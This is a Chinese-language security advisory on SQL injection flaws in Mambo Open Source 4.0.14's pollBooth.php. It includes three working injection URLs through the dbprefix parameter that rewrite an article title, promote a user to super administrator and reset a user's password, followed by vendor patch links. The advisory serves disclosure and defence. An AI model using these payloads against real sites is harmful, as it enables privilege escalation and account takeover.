安全研究

安全漏洞
Mambo Open Source pollBooth.php多个SQL注入漏洞

发布日期:2003-12-10
更新日期:2003-12-16

受影响系统:
Mambo Mambo Open Source 4.0.14
描述:
BUGTRAQ  ID: 9197

Mambo Open Source是一款开放源代码的WEB内容管理系统。

Mambo Open Source包含的'pollBooth.php'脚本缺少正确的输入验证,远程攻击者可以利用这个漏洞进行SQL注入攻击,可更改数据库信息。

'pollBooth.php'脚本包含的多个URI参数如dbprefix的mos_users,dbprefix的mos_articles等对用户提交的额外输入缺少充分过滤,提交包含恶意SQL命令的数据可更改原来数据库逻辑,导致信息泄露或者数据库被更改。

<*来源:frog-m@n (frog-man@security-corporation.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107109991117914&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

frog-m@n (frog-man@security-corporation.com)提供了如下测试方法:

# The title of the article N?23 becomes "hop" :
http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_articles%20SET%20title=char(104,111,112)
%20WHERE artid=23/*

# The user having id 52 becomes "super administrator" :
http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_users%20SET%20usertype=char(115,117,
112,101,114,97,100,109,105,110,105,115,116,114,97,116,111,114)
%20WHERE%20id=52/*

# The password of the user having id 10 becomes 'a' :
http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_users%20SET%20password=md5(char(97))
%20WHERE%20id=10/*

建议:
厂商补丁:

Mambo
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

其中Patch 1必须先于Patch 2安装:

Mambo Mambo Open Source 4.0.14:

Mambo Upgrade MamboV4.0.14-patch-02.tar.gz
http://heanet.dl.sourceforge.net/sourceforge/mambo/MamboV4.0.14-patch-02.tar.gz

Mambo Upgrade MamboV4.0.14-patch-01.tar.gz
http://heanet.dl.sourceforge.net/sourceforge/mambo/MamboV4.0.14-patch-01.tar.gz

浏览次数:3632
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障